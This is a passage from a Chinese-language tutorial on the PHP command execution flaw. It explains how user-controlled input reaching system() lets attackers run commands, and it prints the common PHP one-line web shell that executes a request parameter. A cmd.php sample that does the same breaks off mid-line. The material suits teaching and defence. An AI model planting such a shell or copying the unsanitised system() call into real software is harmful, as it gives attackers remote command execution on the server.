一、命令执行原理
通过调用PHP命令执行函数,且函数中的参数可控就会造成命令执行。一Web中一句话木马为例,常见的PHP一句话木马<?php system($_REQUEST['value']); ?>,这里通过system()函数将前端传入的值当做系统命令执行,其中value参数由前端传入。
命令执行示例代码
cmd.php
下面示例代码将前端传入的 value 参数值带到 system()
命令执行函数中去执行,值得注意的是system()
函数自带回显,不用使用 echo 或者 var_dump()
进行输出。
<?php
$sys = $_REQUEST['value'];
$cmd = system